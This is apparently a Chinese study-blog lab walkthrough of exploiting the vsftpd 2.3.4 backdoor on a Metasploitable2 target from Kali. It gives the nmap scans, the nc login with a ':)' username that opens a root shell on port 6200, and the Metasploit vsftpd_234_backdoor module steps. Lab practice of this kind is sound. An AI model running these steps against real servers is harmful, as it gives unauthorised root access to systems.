此博客为本人学习笔记,如有错误,还请指正。

#vsftpd源码包含后门漏洞
#思路:开放21端口,并且vsftpd版本号为2.3.4
#原理:在特定版本的vsftpd服务器程序中,被人恶意植入代码,当用户名以“:)”结尾时,服务器就会在6200端口监听,并且能够执行任意代码。

实验环境
攻击机:kali :192.168.111.128
靶机:Metasploitable2-Linux:192.168.111.132

Metasploitable 的用户名和密码均为:msfadmin

一、直接在kali终端利用漏洞

1、先测试kali与靶机的连通性
在这里插入图片描述
在这里插入图片描述
2、在kali 终端下对靶机ip地址进行扫描,查看端口情况,发现21端口是打开的

nmap 192.168.111.132

在这里插入图片描述
3、继续扫描该端口版本,发现是含有笑脸漏洞的vsftpd版本。

nmap -p 21 192.168.111.132 -sV

在这里插入图片描述4、攻击前我们先查看6200端口情况(此时端口是关闭的)

nmap -p 6200 192.168.111.132

在这里插入图片描述
5、连接21端口并通过笑脸漏洞登录

nc 192.168.111.132 21
user 任意用户名(以“:)”结尾即可)
pass 任意密码

在这里插入图片描述
6、重新打开一个终端,查看6200端口情况,发现已经打开

nmap -p 6200 192.168.111.132

在这里插入图片描述7、在控制台连接6200端口,获得shell,输入whoami,发现是root权限(要在6200端口打开的情况下才能连接成功)

nc 192.168.111.132 6200

在这里插入图片描述

二、用msfconsole利用漏洞

1、打开终端,进入msfconsole
在这里插入图片描述
2、利用search命令查找我们需要的漏洞模块vsftpd(笑脸漏洞)

search vsftpd

在这里插入图片描述
3、使用漏洞,输入命令

use exploit/unix/ftp/vsftpd_234_backdoor

或者

use 0

在这里插入图片描述4、查看需要设置的参数
在这里插入图片描述5、只需设置目标主机的IP即可
在这里插入图片描述
6、设置好后便可以开始执行攻击exploit
在这里插入图片描述7、获得靶机shell
在这里插入图片描述在这里插入图片描述

参考链接:https://blog.csdn.net/qq_51650968/article/details/121129326

如有侵权,请联系删除。

Logo

更多推荐